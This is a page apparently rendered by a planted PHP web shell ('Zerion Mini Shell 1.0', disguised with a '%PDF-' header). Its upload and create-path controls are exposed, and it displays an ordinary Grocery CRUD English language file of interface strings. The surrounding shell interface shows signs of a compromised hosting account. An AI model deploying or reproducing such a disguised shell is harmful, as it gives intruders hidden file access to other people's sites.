%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/jalalj2hb/public_html/gae/assets/grocery_crud/languages/
Upload File :
Create Path :
Current File : /home/jalalj2hb/public_html/gae/assets/grocery_crud/languages/english.php

<?php
	$lang['list_add'] 				= 'Add';
	$lang['list_actions'] 			= 'Actions';
	$lang['list_page'] 				= 'Page';
	$lang['list_paging_of'] 		= 'of';
	$lang['list_displaying']		= 'Displaying {start} to {end} of {results} items';
	$lang['list_filtered_from']		= '(filtered from {total_results} total entries)';
	$lang['list_show_entries']		= 'Show {paging} entries';
	$lang['list_no_items']			= 'No items to display';
	$lang['list_zero_entries']		= 'Displaying 0 to 0 of 0 items';
	$lang['list_search'] 			= 'Search';
	$lang['list_search_all'] 		= 'Search all';
	$lang['list_clear_filtering'] 	= 'Clear filtering';
	$lang['list_delete'] 			= 'Delete';
	$lang['list_edit'] 				= 'Edit';
	$lang['list_paging_first'] 		= 'First';
	$lang['list_paging_previous'] 	= 'Previous';
	$lang['list_paging_next'] 		= 'Next';
	$lang['list_paging_last'] 		= 'Last';
	$lang['list_loading'] 			= 'Loading...';

	$lang['form_edit'] 				= 'Edit';
	$lang['form_back_to_list'] 		= 'Back to list';
	$lang['form_update_changes'] 	= 'Update changes';
	$lang['form_cancel'] 			= 'Cancel';
	$lang['form_update_loading'] 	= 'Loading, updating changes...';
	$lang['update_success_message'] = 'Your data has been successfully updated.';
	$lang['form_go_back_to_list'] 	= 'Go back to list';

	$lang['form_add'] 				= 'Add';
	$lang['insert_success_message'] = 'Your data has been successfully stored into the database.';
	$lang['form_or']				= 'or';
	$lang['form_save'] 				= 'Save';
	$lang['form_insert_loading'] 	= 'Loading, saving data...';

	$lang['form_upload_a_file'] 	= 'Upload a file';
	$lang['form_upload_delete'] 	= 'delete';
	$lang['form_button_clear'] 		= 'Clear';

	$lang['delete_success_message'] = 'Your data has been successfully deleted from the database.';
	$lang['delete_error_message'] 	= 'Your data was not deleted from the database.';

	/* Javascript messages */
	$lang['alert_add_form']			= 'The data you had insert may not be saved.\\nAre you sure you want to go back to list?';
	$lang['alert_edit_form']		= 'The data you had change may not be saved.\\nAre you sure you want to go back to list?';
	$lang['alert_delete']			= 'Are you sure that you want to delete this record?';

	$lang['insert_error']			= 'An error has occurred on insert.';
	$lang['update_error']			= 'An error has occurred on saving.';

	/* Added in version 1.2.1 */
	$lang['set_relation_title']		= 'Select {field_display_as}';
	$lang['list_record']			= 'Record';
	$lang['form_inactive']			= 'inactive';
	$lang['form_active']			= 'active';

	/* Added in version 1.2.2 */
	$lang['form_save_and_go_back']	= 'Save and go back to list';
	$lang['form_update_and_go_back']= 'Update and go back to list';

	/* Upload functionality */
	$lang['string_delete_file'] 	= "Deleting file";
	$lang['string_progress'] 		= "Progress: ";
	$lang['error_on_uploading'] 	= "An error has occurred on uploading.";
	$lang['message_prompt_delete_file'] 	= "Are you sure that you want to delete this file?";

	$lang['error_max_number_of_files'] 	= "You can only upload one file each time.";
	$lang['error_accept_file_types'] 	= "You are not allow to upload this kind of extension.";
	$lang['error_max_file_size'] 		= "The uploaded file exceeds the {max_file_size} directive that was specified.";
	$lang['error_min_file_size'] 		= "You cannot upload an empty file.";

	/* Added in version 1.3.1 */
	$lang['list_export'] 	= "Export";
	$lang['list_print'] 	= "Print";
	$lang['minimize_maximize'] = 'Minimize/Maximize';
	
	/* Added in version 1.4 */
	$lang['list_view'] = 'View';

	/* Added in version 1.5.1 */
	$lang['ui_day'] = 'dd';
	$lang['ui_month'] = 'mm';
	$lang['ui_year'] = 'yyyy';

	/* Added in version 1.5.2 */
	$lang['list_more'] = 'More';

	/* Added in version 1.5.6 */
	$lang['list_search_column'] = 'Search {column_name}';

	/* Added in version 1.5.8 */
	$lang['alert_delete_multiple'] = 'Are you sure that you want to delete those {items_amount} items?';
	$lang['alert_delete_multiple_one'] = 'Are you sure that you want to delete this 1 item?';


Zerion Mini Shell 1.0